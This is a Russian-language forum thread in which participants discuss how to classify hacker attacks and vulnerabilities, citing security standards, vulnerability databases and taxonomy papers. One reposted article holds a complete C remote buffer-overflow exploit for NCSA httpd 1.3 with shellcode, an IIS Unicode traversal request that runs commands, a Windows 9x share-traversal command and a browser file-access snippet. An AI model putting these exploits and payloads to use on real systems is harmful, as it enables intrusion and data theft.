Сообщений в теме: 12

[Green]

Коллеги,

порекомендуйте материалы по классификации хакерских атак. Было бы отлично, если бы описание каждой атака замыкалось на указание типа уязвимостей или механизма, которые она использует.

Например:
Атака на пароль пользователя.
Механизмы:
1. Прослушивание подключения, по которому выполняется базовая аутентификация - используется SSL/TSL.
2. Взлом хранилоща пользовательских реквизитов на сервере - необходим физический доступ к серверу.
3. Применение хакерского ПО для чтения пароля локального пользователя -
а. хакер внедряет троянскую программу, позволяющую получить пароль;
б. хакер устанавливает на компьютере спай программу - необходим физический доступ к компьютеру.

Спасибо.

[Spy]

Задачка сложная. Как говорил великий математик Абель: "Прежде чем узнать чему равно какое-то соотношение, нужно сначало спросить: а существует ли оно?".

Сомневаюсь, что можно создать такую универсальную классификацию. Насколько мне известно, немецкий стандарт BSI и является подобной попыткой. Думаю, что это многотомное, многостраничное издавние устарело сразу после его публикации (год этак 1997, повторных публикаций не было).

Коли уж по стандартам. То стандарт ISO 17799 (в РФ готовится национальный эквивалент, в РБ уже есть) даёт перечень требований к организацинным процедурам, которые должны предприниматься на предприятии - взаимодействие с партнёрами, обеспечение бесперебойности работы предприятия и т.д. Что-то типо CMMI для вопросов безопасности. Хакерские атаки там в явном виде не даны, но подразумевается, что не соблюдение этих требований могут привести к реализации сих атак: социальная инженерия, конкурентная разведка, нарушение правил эксплуатации используемых ИТ, саботаж внутренних сотрудников и партнёров, нарушение требований безопасности при разработке собственных продуктов и т.д.

Для программно технической среды имеется стандарт ISO 15408 (и в РФ, и в РБ есть национальные эквиваленты). В стандартах даются каталог угроз, политик безопасности, функций и гарантийных требований которые имеют отношение к безопасности, стандарт открыт, в него можно вносить собственные функциональные и гарантийные классы и постоянно развивается. Организация ИСО собирается выпустить очередные версии этого стандарта в следующем году. Гарантийные требования призваны убедить заказчика в том, что производить произвёл безопасный продукт (т.е. имеющиеся функции безопасны, реализованы надёжно). Функциональные - функции защиты информации в продукте.

В стандартах напрочь отсутствует каталог уязвимостей, потому как их пруд-пруди и они постоянно меняются. Единственно, если в BSI он был, но мне стандарт не попадался, описание скудно.

Далее, существуют интернет-каталоги уязвимостей, уязвимости сопровождаются описанием: что и как при помощи их можно сделать, порой с эксплойтом, который их реализует.

http://securityfocus.com
http://osvdb.org
http://securitylab.ru

Далее для специальных видов автоматизированных систем (например, банковских), для спецсофта есть спецпубликации, которые пытаются отвечать на подобные вопросы. Только я не знаю какой софт вас интересует.

[Green]

В жарких спорах с коллегой пришли к выводу, что классификация хакерских атак не имеет глобального значения, так как они (атаки) носят комплексный характер и могут эксплуатировать несколько уязвимостей.

В этом случае хочется переформулировать вопрос.

Существуют ли устоявшиеся системы квалификации уязвимостей, использующиеся для учета и документирования? Другими словами, как может быть организована база данных уязвимостей?

[I_G]

Основные инструменты хакера:

Сниффер – программа – перехватчик траффика

Сканер – для получения информации о доступных портах удаленного компа

Троян – программа, засылающаяся на удаленный комп и выдающая хакеру информацию о системе и пароли.




Классификация интеренет атак

АТАКИ
Существующая статистика угроз несанкционированного доступа к информации

Разработку требований к системе защиты целесообразно рассматривать на фоне существующей в мире статистики угроз несанкционированного доступа к информации. Данная статистика показывает, какие угрозы наиболее часто используются нарушителями, соответственно, какие классы угроз, в первую очередь, следует учитывать в рамках разработки требований к системе защиты.
Будем рассматривать только семейства ОС:

- UNIX
- MS Windows
- Novell NetWare

С учетом данных рассылки Security Focus за 1999-2000 годы получаем следующую картинку соотношения результативных атак на ОС
Соотношение результативных атак на ОС:
MS Windows - 26%
UNIX - 73%
Novell NetWare - 1%

Все методы, позволяющие несанкционированно вмешаться в работу системы можно разделить на следующие группы:

1. Позволяющие несанкционированно запустить исполняемый код,
2. Позволяющие осуществить несанкционированные операции чтения/записи файловых или других объектов,
3. Позволяющие обойти установленные разграничения прав доступа
4. Приводящие к отказу (Denial of Service) в обслуживании (системный сбой),
5. Использующие встроенные недокументированные возможности (закладки),
6. Использующие недостатки системы хранения или выбора (недостаточная длина) данных об аутентификации (пароли) и позволяющие путем реверсирования, подбора или полного перебора всех вариантов получить эти данные,
7. Троянские программы,
8. Прочие.

Теперь рассмотрим соответствующие методы атак по приведенным группам.


Группа 1.
К первой группе относятся методы (exploits), которые основываются на переполнении буфера для входных данных (переполнение стека) и затем передачи управления на исполняемый код занесенный при этом в стек. Для переполнения стека используется тот факт, что часто при выполнении функций работы со строками, переменными среды исполнения и т.д., авторы ПО не заботятся о проверке размерности входных данных, что и приводит к выходу за границы массивов выделенных для работы с этими данными. В последнее время появилось целое направление системных средств по борьбе с ошибками данного класса (Pax, StackGuard).
Одним из методов предотвращения подобных ошибок является присвоение атрибута исключающего исполнение кода страницам памяти, выделенным под стек.
Большая часть примеров, реализующих этот метод атак, рассчитаны на системы на базе ОС семейства UNIX. Переполнение буфера возможно в самых разнообразных приложениях и системных утилитах. Наиболее часто оно используется для удаленного запуска исполняемого кода посредством обработчиков сетевых запросов и протоколов (ftp, telnet, pop3 и др.).
Переполнение буфера можно использовать и в локальном контексте, для того чтобы увеличить свои привилегии или получить доступ на уровне администратора системы (root).
Пример переполнения входного буфера NCSA 1.3 HTTPD:

/* * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23 * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!! * * usage: * $ (hackttpd 0; cat) | nc victim 143 * | * +-- usually from -1000 to 1000 (try steeps of 100) */
#include <stdio.h>
unsigned char shell[] = { '/',0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76, 0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b, 0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff, 'b','i','n','/','s','h' };
char username[256+8];
void main(int argc, char *argv[]) { int i,a; long val;
if(argc1) a=atoi(argv[1]); else a=0; strcpy(username,shell);
for(i=strlen(shell);i<sizeof(username);i++)
username[i]=0x90; /* NOP */
val = 0xbfff537c + 4 + a; i=sizeof(username)-4; { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) 8; username[i+2] = (val & 0x00ff0000) 16; username[i+3] = (val & 0xff000000) 24; } username[ sizeof(username) ] = 0;
printf("GET %s\n/bin/bash -i 2&1;\n", username); }

Другими примерами реализации этого метода являются такие программы как:
- Zgv_exploit.c
- Kmemthief.c
- Imapd_exploit.c
- и др.
Для ОС семейства UNIX эта группа включает в себя наибольшее количество опубликованных примеров для несанкционированного доступа к системе (более 30%).
Для ОС семейства MS Windows, применение данного метода тоже возможно, но в основном это приводит только к сбоям прикладного или системного уровня, которые мы отнесли к другой группе. Общее число примеров использующих переполнения буфера для целей отличных от вывода системы из строя не превышает 10%.


Группа 2.
Ко второй группе можно отнести методы (exploits), основывающиеся на неправильной интерпретации прикладными и системными программами входных параметров и в результате дающие доступ к объектам, не перечисленным в списках санкционированного доступа. Неправильная интерпретация входных параметров связана с некорректной программной реализацией их обработки. Т.к. программы обрабатывающие данные запросы являются либо системными утилитами, либо прикладными программами, запущенными в контексте безопасности системы, то они имеют непосредственный доступ к любым файловым (и другим) объектам и могут предоставить этот доступ взаимодействующим с ними пользователями, не обладающими достаточными правами для непосредственной работы с этими объектами. Наибольшее распространение получили реализации данных методов для ОС семейства MS Windows. В основном ошибки встречаются в стандартных Internet/Intranet приложениях, которые включены в состав ОС, таких как IIS (Internet Information Server), почтовые клиенты (MS Mail, Exchange ми др.)
Достаточно большое количество ошибок данного рода можно встретить в системных утилитах реализующих взаимодействие по сетевым протоколам прикладного уровня (NetBios и др.)
В качестве типичных примеров можно привести ошибку в Windows 9X, дающую несанкционированный доступ к разделяемым ресурсам и ошибочную обработку запросов в IIS.

Ошибка в Windows 9X заключается в следующем:
Есть выделенный ресурс (например, C:\PUB, видимый как PUB).
Присоединившись к нему (smbclient для UNIX) и выполнив команду dir можно увидеть содержимое PUB.
Затем дав команду dir .\...\WINDOWS\*.* можно увидеть содержимое C:\WINDOWS т.е. каталога, не доступного для сети.
Иногда можно создавать/удалять каталоги, читать/писать файлы по всему диску. Такая возможность работает и через ресурс PRINTER$.
Smbclient входит в поставки UNIX (например Debian Linux 1.3 и 2.0)

Ошибка в IIS заключается в следующем:

IIS, обрабатывая запросы в формате UNICODE, может неправильно интерпретировать символы '\' , '/' и т.п. (%c0%af , %c1%9c и т.п.), что приводит в дальнейшем к генерации некорректных команд (недоступных в нормальной ситуации) и получению несанкционированного доступа к объектам. Выполнив следующий запрос:
http://address.of.iis5.system/scripts/..%c.../c+dir+c:\
пользователь получит список каталогов, что не предусмотрено при нормальном функционировании системы.
Возможно также осуществление несанкционированного чтения, записи и даже запуска исполняемого кода.

Большое количество ошибок встречается в реализации Java-апплетов, VB-скриптов и т.д. в броузерах фирм Microsoft и Netscape. С помощью соответствующих апплетов можно получить несанкционированный доступ к файловым объекта.
Следующий фрагмент для MS IE (Internet Explorer) 5.0 получает доступ к файловым объектам:

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski....acodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>

В целом проблема не относится собственно к языку Java , но к его реализации, в данном случае Microsoft Java VM (Virtual Machine).

Т.к. обе фирмы выпускают свои броузеры не только для ОС семейства MS Windows, но и для ОС семейства UNIX, то ошибки в большинстве случаев дублируются в версиях ПО для разных платформ.


Группа 3.
К третьей группе можно отнести примеры, основывающиеся на недоработках в ядре и системных утилитах ОС, позволяющих программными методами обходить установленные разграничения доступа к объектам системы.
Примеры ошибок составляющих эту группу немногочисленны и требуют детального анализа работы механизмов (функций API) ОС. При этом нужно учитывать, что при рассмотрении коммерческих ОС (не имеющих общедоступных исходных текстов) данный анализ сильно затруднен (т.к. производители ОС крайне неохотно документируют внутреннюю архитектуру систем).
В качестве примера для данной группы можно привести известную программу "GetAdmin", реализующую получение администраторских прав, используя некорректную работу функции NTAddAtom, позволяющую записывать значения в любую область адресного пространства. В системе Windows NT есть некий глобальный флаг NtGlobalFlag, имеющий адрес примерно 0x801XXXXX. Изменением одного из битов этого флага мы можем превратить Windows NT в Windows NT Checked Build, и право "SeDebugPrivilege" не будет необходимо для внедрения в системные процессы. Далее внедряя свой исполняемый код (для чего нужна была привилегия "SeDebugPrivilege") в системные процессы, мы можем обойти любые ограничения связанные с политикой безопасности (в данном случае создавался пользователь с администраторскими правами).


Группа 4.
К четвертой группе можно отнести методы, приводящие к отказу в обслуживании (системный сбой). Большую часть этой группы составляют примеры, основанные на недостаточной надежности реализации стека сетевых протоколов ОС. Сбои в работе ОС достигаются посылкой групп пакетов с некорректными заголовками, параметрами и т.п. или просто посылкой очень большой группы пакетов, на обработку которых у системы недостаточно ресурсов.
Примерами подобных программ служат:
- teardrop
- jolt/jolt2
- lornuke
- winnuke
- winfreez
- win95ping
Следует отметить, что программы представляющие данную группу не нарушают напрямую безопасность атакуемой системы, а просто выводят ее из строя. Но можно представить себе пример более сложных атак, где методами, приводящими к отказу от обслуживания, можно устранять, например, реально действующие в системе узлы, а затем от их имени получать несанкционированный доступ к защищенным данным.


Группа 5.
К пятой группе можно отнести методы, использующие встроенные недокументированные возможности (закладки). К таким закладкам относятся встроенные инженерные пароли для входа в систему, например, широко известный пароль фирмы Award "AWARD_SW", специальные возможности (последовательность действий) для недокументированных действий (например, в одном из хранителей экрана фирмы Microsoft присутствует сетевой код), закладки в разнообразных прикладных приложениях и т.п.

Группа 6.
К шестой группе можно отнести программы, использующие недостатки системы хранения или выбора (недостаточная длина) данных об аутентификации (пароли) и позволяющие путем реверсирования, подбора или полного перебора всех вариантов получить эти данные. Эти программы основываются на недостатках алгоритмов кодирования (хеширования) паролей на защищенные ресурсы или на вход в ОС.
Примером может служить реализация защиты разделяемых ресурсов в Windows 9X, где при разграничении доступа на уровне ресурса (по паролю), пароль для доступа хранится в реестре (HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\<ИМЯ КАТАЛОГА>, в ключе Parm1Enc) зашифрованный с помощью алгоритма, который легко расшифровать, т.е. получить исходный пароль.
Также неудачен сам алгоритм аутентификации в Windows 9X через NETBIOS. Если клиент посылает вместо полного пароля открытым текстом только его первый символ (байт), то при совпадении этого символа, пароль считается правильным.
Существует также большое количество недостаточно защищенных механизмов применения аутентификации в ОС семейства MS Windows.
Следует отметить, что существует большое количество программ (не только для ОС семейства MS Windows) предназначенных для перебора паролей по различным алгоритмам, учитывающим слабость реализации систем аутентификации и выбора паролей. К таким программам относятся:
- l0phtcrack
- pwlhack
- pwlview
- John the Ripper
- и т.д.

Группа 7.
К седьмой группе можно отнести так называемые "троянские" программы. Это программы, которые прописываются в автозагрузку ОС или подменяют собой системные компоненты (утилиты) ОС и выполняют несанкционированные действия. Для того, чтобы такая программа появилась в системе, пользователь должен сам (непреднамеренно) первоначально выполнить ее. Обычно "троянские" программы распространяются под видом полезных утилит, посылаются по почте в виде присоединяемых замаскированных исполняемых файлов, скриптов и т.п. После первого запуска программа заменяет собой часть системных файлов или просто добавляет себя в список загрузки и предоставляет нарушителю доступ к системе или защищаемым ресурсам "жертвы".
Примером подменяющей программы может служить динамическая библиотека клиента Novell NetWare для OC Windows NT "FPNWCLNT.DLL", перехватывающая и хранящая передаваемые пароли в открытом виде.
Другие программы из этой группы:
- Back Orifice
- Net Bus
- Priority
- и т.д.


Группа 8.
К восьмой группе отнесем все остальные методы и программные реализации, влияющие на функционирование и безопасность компьютерной системы.

Процентное соотношение каждой выделенной группы атак в общем списке для ОС семейства Windows:
1 группа (исполняемый код) - 6%
2 группа (чтение/запись) - 32%
3 группа (РПД) - 4%
4 группа (DoS системый сбой) - 27%
5 группа (закладки) - 5%
6 группа (пароли) - 9%
7 группа (троянские программы) - 12%
8 группа (прочие) - 5 %

Процентное соотношение каждой выделенной группы в общем списке для ОС семейства UNIX, см. рис.4.
1 группа (исполняемый код) - 39%
2 группа (чтение/запись) - 2%
3 группа (РПД) - 4%
4 группа (DoS системый сбой) - 24%
5 группа (закладки) - 3%
6 группа (пароли) - 7%
7 группа (троянские программы) - 8%
8 группа (прочие) - 13 %

В результате видим, что наибольшее представительство имеют атаки, приводящие к отказу (Denial of Service) в обслуживании (которые, по большому счету, связаны с работоспособностью системы, а не с фактами НСД). Далее следуют атаки, позволяющие несанкционированно запустить исполняемый код и атаки, позволяющие осуществить несанкционированные операции чтения/записи файловых или других объектов. Доля остальных атак менее значительна.
Из приведенного исследования можем сделать следующие выводы:
- широкий класс атак представляют атаки, приводящие к отказу в обслуживании. Для ЛВС эти атаки наиболее характерны из внешней сети ИНТЕРНЕТ на серверы внешнего доступа. Противодействие подобным атакам, которые не связаны в общем случае с НСД, можно осуществлять средствами межсетевого экранирования,
- существенную проблему именно связанную с фактами НСД представляют атаки, позволяющие несанкционированно запустить исполняемый код, внести и запустить деструктивный процесс, троян и т.д. Здесь может быть оказано противодействие, предполагающее, во-первых, ограничение возможности запускаемых программ (процессов), во-вторых, ограничение возможности занесения в систему подобных программ (процессов), в-третьих, противодействие отправки информации по адресу ее похитителя (это может быть реализовано на рабочих станциях и серверах средствами добавочной защиты),
- проблему, связанную с фактами НСД, составляет и преодоление защитных механизмов, за счет использования злоумышленником знания об ошибках и закладках в программном обеспечении, этому должно быть реализовано противодействие. Сложность такого противодействия состоит в том, что, на наш взгляд, отыскать ошибку, а уж тем более закладку, в достаточно сложном программном обеспечении практически невозможно. Это требует принципиально новых решений по противодействию рассмотренному классу угроз (это может быть реализовано на рабочих станциях и серверах средствами добавочной защиты),
- недостаточно надежная реализация разграничительной политики встроенными механизмами защиты компенсируется механизмами технических средств добавочной защиты,
- вопросы подбора паролей решаются в двух плоскостях, во-первых, должны быть реализованы определенные требования к паролю, что осуществляется как добавочной защитой, так и средствами ОС Windows NT, при этом должен скрываться факт ввода пароля пользователем (желательно, чтобы пароль вносился не с клавиатуры, а скрытно, например, с внешнего носителя - дискеты), во-вторых, должны минимизироваться возможности получения пароля в сегменте сети с использованием программы сниффер (либо из канала, либо с клавиатуры), подбора пароля с использованием различных программ сканер и т.д. Этот аспект в большой части связан с внедрением на рабочую станцию деструктивных программ,
- противодействие атакам, позволяющим осуществить несанкционированные операции чтения/записи файловых или других объектов связаны с реализацией некоторых основных принципов архитектурной реализации защищенной ЛВС.

[Green]

Спасибо I_G, не плохая статья.
А можно линк на первоисточник?

[Scorp-13]

http://www.cnews.ru/...vis_class.shtml(рус.)

http://www.webappsec...rojects/threat/(англ.)

[I_G]

А можно линк на первоисточник?

К сожалению линка на первоисточник нет, так как эта статю нашел на одном из хакерских CD. Но, набрав в яндексе "Классификация интеренет атак", поличил массу ссылок на эту статью, причем почти в кажой публикации - свой автор по этой статье :)

[Spy]

Существуют ли устоявшиеся системы квалификации уязвимостей, использующиеся для учета и документирования? Другими словами, как может быть организована база данных уязвимостей?

http://securityfocus.com
http://osvdb.org
http://securitylab.ru

[Spy]

Типы сетевых атак, их описания и средства борьбы
19.09.2001, среда
http://www.cnews.ru/...attacks.shtml#1

Публикуемая ниже классификация, составлена одним из ведущих специалистов в сфере ИБ в Восточной Европе, системным инженером компании Cisco Systems, Михаилом Кадером и публикуется с его любезного разрешения.

[Eugene]

В этом случае хочется переформулировать вопрос.

Существуют ли устоявшиеся системы квалификации уязвимостей, использующиеся для учета и документирования? Другими словами, как может быть организована база данных уязвимостей?

Если не ограничиваться только хакерскими атаками, а рассматривать уязвимости информационых систем в целом, то в качестве устоявшейся системы классификации можно взять SEI OCTAVE, которая включает в себя построение так называемых threat profiles.

Threat Profile
A key aspect of OCTAVE is the identification and analysis of threats to the organization’s assets. A threat is an indication of a potential undesirable event. It refers to a situation in which a person could do something undesirable (an attacker initiating a denial-of-service attack against an organization’s email server) or a natural occurrence could cause an undesirable outcome (a fire damaging an organization’s information technology hardware). Threats consist of the following properties:
· asset – something of value to the organization (information in electronic or physical form, information systems, a group of people with unique expertise)
· actor – who or what may violate the security requirements (confidentiality, integrity, availability) of an asset. Actors can be from inside or outside the organization.
· motive (optional) – indication of whether the actor’s intentions are deliberate or accidental 
· access (optional) – how the asset will be accessed by the actor (network access, physical access)
· outcome – the immediate result of violating the security requirements of an asset (disclosure, modification, destruction, loss, interruption)
In the OCTAVE Method, the analysis team creates threat scenarios based on known sources of threat and typical threat outcomes. Threats with a common theme can be grouped together. During OCTAVE, the following standard categories of threat are considered:
· human actors using network access – The threats in this category are network-based threats to an organization’s critical assets. They require direct action by a person and can be deliberate or accidental in nature.
· human actors using physical access – The threats in this category are physical threats to an organization’s critical assets. They require direct action by a person and can be deliberate or accidental in nature.
· system problems – The threats in this category are problems with an organization’s information technology systems. Examples include hardware defects, software defects, unavailability of related enterprise systems, viruses, malicious code, and other system-related problems.
· other problems – The threats in this category are problems or situations that are outside the control of an organization. This category of threats includes natural disasters (such as floods, earthquakes, and storms) that can affect an organization’s information technology systems as well as interdependency risks. Interdependency risks include the unavailability of critical infrastructures (telecommunications, electricity, etc.). Other types of threats outside the control of an organization can also be included here. Examples of these threats are power outages, broken water pipes, etc.
An organization usually has some control over humans accessing assets over a computer network or by physical means, as well as some control over system problems. The category of other problems is used for those that tend to fall outside the control of the organization. In this category, the effects of the threat can be controlled to some extent, but the source of the threat cannot be controlled.
The resulting outcome or effect of these threat scenarios typically falls into these categories:
· disclosure or viewing of sensitive information
· modification of important or sensitive information
· destruction or loss of important information, hardware, or software
· interruption of access to important information, software, applications, or services

Документы доступны здесь:
http://www.cert.org/octave/pubs.html

[Spy]

Вось, порылся я и таки нашёл более-менее подходящий материал.

A Structured Approach to Classifying Security Vulnerabilities
Robert C. Seacord, Allen D. Householder
January 2005
http://www.sei.cmu.e...pdf/05tn003.pdf


SOFTWARE VULNERABILITY ANALYSIS
A Thesis Submitted to the Faculty of Purdue University by Ivan Victor Krsul
In Partial Fulllment of the Requirements for the Degree of Doctor of Philosophy
May 1998
http://www.securitym...-phd-thesis.pdf

A Taxonomy of Computer Program Security Flaws
CARL E. LANDWEHR, ALAN R. BULL, JOHN P. MCDERMOTT, AND WILLIAM S. CHOI
http://www.cs.virgin...11-landwehr.pdf

Интересный проект - единое описание обновлений, уязвимостей различных продуктов: ОСы, софт в виде XML - http://oval.mitre.org/about/
Удивило большое число специалистов, участвующих в этом проекте от серьёзных контор - http://oval.mitre.or...oard/board.html

У одной из баз уязвимостей, которую я упоминал ранее: osvbd.org, был найден интересный обзор стандартизации уязвимостей:
http://osvdb.org/vuln-standards.php

ну, может - поможет

[Spy]

Единственно, если в BSI  он был, но мне стандарт не попадался, описание скудно.

Таки нашёл я приличное описание этого стандарта. Так чтобы не быть голословным:
Методологические аспекты германского стандарта "Руководство по базовому уровню защиты информационных технологий
Л.В. Скрипник, М.Ф. Бондаренко, И.Д. Горбенко, А.А. Ткач, А.В. Потий
http://bezpeka.com/f...bgtpgermstd.zip

Поскольку развитие информационных технологий отличается высокими темпами развития, BSI каждые шесть месяцев модифицирует и расширяет Руководство путем модификации суще-ствующих, либо добавлением новых компонент (структурных модулей, процедур, угроз и т. д.). В результате возникает проблема «объять необъятное». Границы понятий «разумный и доста-точный уровень защиты ИТ» и «базовый уровень ИТ-безопасности» является плавающими. Аналогично обстоит дело и с понятиями «совокупность идентифицированных мероприятий безопасности» и «типичные» системы ИТ. Однако это нельзя считать большим недостатком. Более того, Руководство предлагает достаточно гибкий инструмент адаптации информационных технологий к постоянно изменяющимся требованиями ИТ-безопасности.

Преимуществом Руководства является его высокая степень детализации и ориентирован-ность на специалиста со средним уровнем квалификации, в отличие от международного стан-дарта ISO/OEC 17799 и британского BS 7799, применение которых на практике требует высоко-го уровеня квалификации специалистов. Другими словами, реализация требований и положений германского стандарта может осуществляться силами соответствующих подразделений организации, в то время как международный стандарт может быть реализован только путем привлече-ния специализированных фирм. По мнению авторов, Руководство целесообразно применять в дополнение с указанными стандартами в целях облегчения процессов определения перечня угроз и совокупности защитных мер безопасности ИТ.

[loozer]

Любая безопасность стоит на 3 китах:
1)админ
2)пользователь
3)хакер

Для примера http://depositfiles.com/files/6441338